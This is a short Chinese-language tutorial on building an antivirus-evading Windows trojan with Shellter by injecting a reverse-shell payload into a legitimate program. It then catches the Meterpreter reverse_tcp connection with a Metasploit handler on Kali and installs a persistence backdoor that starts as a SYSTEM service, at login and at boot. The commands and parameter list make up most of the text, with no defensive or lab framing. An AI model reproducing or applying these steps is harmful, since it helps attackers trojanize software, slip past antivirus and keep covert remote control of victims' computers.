Windows免杀木马+维持权限(shellter)
一.生成木马
工具:shellter
环境:windows xp,Windows 7
操作:
-
cmd 打开 shellter.exe
-
选择a,y
-
输入要注入木马的程序路径
-
选择y,l,1
-
输入返回的ip
-
最后回车就好了
二.开始监听
环境:kali
命令:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.112(返回ip)
set LPORT 1234(端口)
run
拿到shell
三.维持权限
在shell下
自动切换到稳定的进程:
run post/windows/manage/migrate
安装后门:
run persistence -S -U -X -i 10 -p 5555 -r 192.168.1.122
具体参数含义:
-A 自动启动一个匹配的exploit / multi / handler来连接到代理
-L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。
-S 作为服务自动启动代理程序(具有SYSTEM权限)
-T 要使用的备用可执行模板
-U 用户登录时自动启动代理
-X 系统引导时自动启动代理程序
-h 帮助菜单
-i 每次连接尝试之间的时间间隔(秒)
-p 运行Metasploit的系统正在侦听的端口
-r 运行Metasploit监听连接的系统的IP